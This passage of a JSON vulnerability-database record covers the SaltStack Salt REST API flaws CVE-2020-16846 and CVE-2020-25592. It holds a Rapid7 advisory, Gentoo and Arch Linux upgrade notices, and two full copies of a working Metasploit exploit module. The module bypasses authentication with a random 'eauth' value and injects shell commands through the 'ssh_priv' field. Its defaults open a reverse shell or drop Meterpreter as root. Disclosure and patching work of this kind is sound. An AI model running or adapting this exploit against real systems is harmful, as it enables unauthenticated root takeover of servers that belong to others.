Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-11-13T19:08:01", "published": "2020-11-13T19:08:01", "id": "RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7", "href": "https://blog.rapid7.com/2020/11/13/metasploit-wrap-up-87/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T14:46:17", "bulletinFamily": "info", "cvelist": ["CVE-2020-11651", "CVE-2020-16846", "CVE-2020-25592"], "description": "## What\u2019s up?\n\n\n\nWe start the November critical vulnerability season with a pair of CVEs\u2014[CVE-2020-16846](<https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection>) and [CVE-2020-25592](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution>)\u2014that, when combined, can result in unauthenticated remote root access on a target system. SaltStack developers [disclosed these weaknesses on Nov. 3, 2020](<https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/>) and have [released patches](<https://gitlab.com/saltstack/open/salt-patches>) for these weaknesses.\n\nBefore reading on, Rapid7 advises all SaltStack users to patch their systems as quickly as possible. If at all possible, **please don\u2019t wait for your typical patch cycle to apply SaltStack security updates.** There are no known mitigations or workarounds as of Nov. 9, 2020. As noted in the aforelinked AttackerKB Rapid7 analysis: _\u201cPre-authenticated remote root is the gold-medal standard for attackers, and it took Rapid7 researchers all of 15 minutes and a single HTTP request to get there.\u201d_\n\n## SaltStack vulnerability information, exposure details, and attacker activity\n\nSaltStack developers noted that the following versions are affected:\n\n * 3002\n * 3001.1, 3001.2\n * 3000.3, 3000.4\n * 2019.2.5, 2019.2.6\n * 2018.3.5\n * 2017.7.4, 2017.7.8\n * 2016.11.3, 2016.11.6, 2016.11.10\n * 2016.3.4, 2016.3.6, 2016.3.8\n * 2015.8.10, 2015.8.13\n\nWhile none of the CVEs have a rating (yet), these combined weaknesses are trivial to exploit and result in complete system compromise, which will happen, since [CVE-2020-11651](<https://attackerkb.com/topics/rEVl04z1p0/cve-2020-11651>), another SaltStack vulnerability from April 2020, was exploited quickly by threat actors. We fully expect CVEs 2020-16846 and 2020-25592 to follow that same path.\n\n\n\n[Rapid7 Labs](<https://www.rapid7.com/research/project-sonar/>) thankfully only discovered 215 vulnerable SaltStack servers in November 2020 scans, but that doesn\u2019t mean your internal SaltStack nodes will not be identified and compromised by attackers who gain footholds as a result of [phishing attacks](<https://www.rapid7.com/fundamentals/phishing-attacks/>).\n\nThere are no mitigations for these vulnerabilities. You must patch your systems to be safe. As of Nov. 9, 2020, Rapid7 Labs[ Project Heisenberg](<https://www.rapid7.com/research/project-heisenberg/>), our global honeypot network, did not detect any malicious SaltStack activity, but that will likely change very quickly.\n\n## Final guidance\n\nAlong with patching, organizations should monitor SaltStack API logs very closely for anomalous activity going back to at least Nov. 3, 2020 and until/after affected SaltStack systems are patched.\n\nGiven that there have been two severe SaltStack weakness episodes in one calendar year, Rapid7 further suggests organizations increase monitoring for anomalies in general on SaltStack systems and stay on top of vulnerability announcements from the SaltStack developers.\n\n#### Vulnerable to CVE-2020-16846 and CVE-2020-25592? Scan Your Environment Today to Find Out.\n\n[Get Started](<https://www.rapid7.com/trial/insightvm>)", "modified": "2020-11-10T14:22:33", "published": "2020-11-10T14:22:33", "id": "RAPID7BLOG:54F1D96262CFC427DBA32564C2E47A77", "href": "https://blog.rapid7.com/2020/11/10/saltstack-pre-authenticated-remote-root-cve-2020-16846-and-cve-2020-25592-what-you-need-to-know/", "type": "rapid7blog", "title": "SaltStack Pre-Authenticated Remote Root (CVE-2020-16846 and CVE-2020-25592): What You Need to Know", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-11-12T16:07:53", "description": "", "published": "2020-11-12T00:00:00", "type": "packetstorm", "title": "SaltStack Salt REST API Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-16846", "CVE-2020-25592"], "modified": "2020-11-12T00:00:00", "id": "PACKETSTORM:160039", "href": "https://packetstormsecurity.com/files/160039/SaltStack-Salt-REST-API-Arbitrary-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SaltStack Salt REST API Arbitrary Command Execution', \n'Description' => %q{ \nThis module exploits an authentication bypass and command injection in \nSaltStack Salt's REST API to execute commands as the root user. \n \nThe following versions have received a patch: 2015.8.10, 2015.8.13, \n2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10, \n2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4, \n3001.1, 3001.2, and 3002. \n \nTested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1. \n}, \n'Author' => [ \n'KPC', # CVE-2020-16846 (ZDI-CAN-11143) \n'wvu' # Exploit \n], \n'References' => [ \n['CVE', '2020-16846'], # Command injection \n['CVE', '2020-25592'], # Auth bypass \n['URL', 'https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/'] \n], \n'DisclosureDate' => '2020-11-03', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :bourne, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(8000), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = execute_command('') \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \n# Server: CherryPy/18.6.0 \nunless res.headers['Server']&.match(%r{^CherryPy/[\\d.]+$}) \nreturn CheckCode::Unknown('Target does not appear to be running Salt.') \nend \n \n# {\"return\": [{}]} \nunless res.code == 200 && res.get_json_document['return'] == [{}] \nreturn CheckCode::Safe('Auth bypass failed.') \nend \n \nCheckCode::Vulnerable('Auth bypass successful.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager(background: true) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") unless cmd.empty? \n \n# https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html#post--run \n# https://github.com/saltstack/salt/pull/58871 \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'run'), \n'ctype' => 'application/json', \n'data' => { \n'client' => 'ssh', \n'tgt' => '*', \n'fun' => rand_text_alphanumeric(8..42), \n'eauth' => rand_text_alphanumeric(8..42), # Auth bypass \n'ssh_priv' => \"/dev/null < /dev/null; (#{cmd}) & #\" # Command injection \n}.to_json \n) \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160039/saltstack_salt_api_cmd_exec.rb.txt"}], "metasploit": [{"lastseen": "2021-01-20T16:49:08", "description": "This module exploits an authentication bypass and command injection in SaltStack Salt's REST API to execute commands as the root user. The following versions have received a patch: 2015.8.10, 2015.8.13, 2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10, 2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4, 3001.1, 3001.2, and 3002. Tested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1.\n", "published": "2020-11-11T19:09:26", "type": "metasploit", "title": "SaltStack Salt REST API Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2020-12-10T04:45:41", "id": "MSF:EXPLOIT/LINUX/HTTP/SALTSTACK_SALT_API_CMD_EXEC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt REST API Arbitrary Command Execution',\n 'Description' => %q{\n This module exploits an authentication bypass and command injection in\n SaltStack Salt's REST API to execute commands as the root user.\n\n The following versions have received a patch: 2015.8.10, 2015.8.13,\n 2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10,\n 2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4,\n 3001.1, 3001.2, and 3002.\n\n Tested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1.\n },\n 'Author' => [\n 'KPC', # CVE-2020-16846 (ZDI-CAN-11143)\n 'wvu' # Exploit\n ],\n 'References' => [\n ['CVE', '2020-16846'], # Command injection\n ['CVE', '2020-25592'], # Auth bypass\n ['URL', 'https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/']\n ],\n 'DisclosureDate' => '2020-11-03', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8000),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # /bin/sh -c 'ssh-keygen -P \"\" -f /dev/null < /dev/null & # -t rsa -q'\n res = send_request_cmd_inject('/dev/null < /dev/null & #')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n # Server: CherryPy/18.6.0\n unless res.headers['Server']&.match(%r{^CherryPy/[\\d.]+$})\n return CheckCode::Unknown('Target does not appear to be running Salt.')\n end\n\n # {\"return\": [{}]}\n unless res.code == 200 && res.get_json_document['return'] == [{}]\n return CheckCode::Safe('Auth bypass failed.')\n end\n\n CheckCode::Vulnerable('Auth bypass successful.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(background: true)\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n # Subshell and background our command injection\n send_request_cmd_inject(\"/dev/null < /dev/null & (#{cmd}) & #\")\n end\n\n def send_request_cmd_inject(cmd_inject)\n # https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html#post--run\n # https://github.com/saltstack/salt/pull/58871\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'run'),\n 'ctype' => 'application/json',\n 'data' => {\n 'client' => 'ssh',\n 'tgt' => '*',\n 'fun' => rand_text_alphanumeric(8..42),\n 'eauth' => rand_text_alphanumeric(8..42), # Auth bypass\n 'ssh_priv' => cmd_inject # Command injection\n }.to_json\n )\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb"}], "gentoo": [{"lastseen": "2020-11-11T09:13:08", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "description": "### Background\n\nSalt is a remote execution and configuration manager.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Salt. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Salt users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/salt-3000.5\"", "edition": 1, "modified": "2020-11-11T00:00:00", "published": "2020-11-11T00:00:00", "id": "GLSA-202011-13", "href": "https://security.gentoo.org/glsa/202011-13", "title": "Salt: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2020-11-17T09:40:02", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16846", "CVE-2020-17490", "CVE-2020-25592"], "description": "Arch Linux Security Advisory ASA-202011-7\n=========================================\n\nSeverity: Critical\nDate : 2020-11-10\nCVE-ID : CVE-2020-16846 CVE-2020-17490 CVE-2020-25592\nPackage : salt\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1262\n\nSummary\n=======\n\nThe package salt before version 2019.2.7-1 is vulnerable to multiple\nissues including arbitrary command execution and access restriction\nbypass.\n\nResolution\n==========\n\nUpgrade to 2019.2.7-1.\n\n# pacman -Syu \"salt>=2019.2.7-1\"\n\nThe problems have been fixed upstream in version 2019.2.7.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-16846 (arbitrary command execution)\n\nAn issue has been found in Salt before 3001.3, 3000.5, 2019.2.7 where\nan unauthenticated user with network access to the Salt API can use\nshell injections to run code on the Salt API using the SSH client.\n\n- CVE-2020-17490 (access restriction bypass)\n\nAn issue has been found in Salt before 3001.3, 3000.5, 2019.2.7 where,\nwhen using the functions create_ca, create_csr, and\ncreate_self_signed_cert in the tls execution module, it will not ensure\nthe key was created with the correct permissions.\n\n- CVE-2020-25592 (arbitrary command execution)\n\nAn issue has been found in Salt before 3001.3, 3000.5, 2019.2.7 where,\nwhen using the SSH client, an unauthenticated user can gain access to\nrun commands against targets set in a Salt-SSH roster.\n\nImpact\n======\n\nA remote, unauthenticated user with network access to the Salt API can\nexecute arbitrary commands.\n\nReferences\n==========\n\nhttps://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/\nhttps://gitlab.com/saltstack/open/salt-patches/-/blob/master/patches/2020/09/02/2019.2.x.patch\nhttps://gitlab.com/saltstack/open/salt-patches/-/blob/master/patches/2020/09/25/2019.2.6.patch\nhttps://security.archlinux.org/CVE-2020-16846\nhttps://security.archlinux.org/CVE-2020-17490\nhttps://security.archlinux.org/CVE-2020-25592", "modified": "2020-11-10T00:00:00", "published": "2020-11-10T00:00:00", "id": "ASA-202011-7", "href": "https://security.archlinux.org/ASA-202011-7", "type": "archlinux", "title": "[ASA-202011-7] salt: multiple issues", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
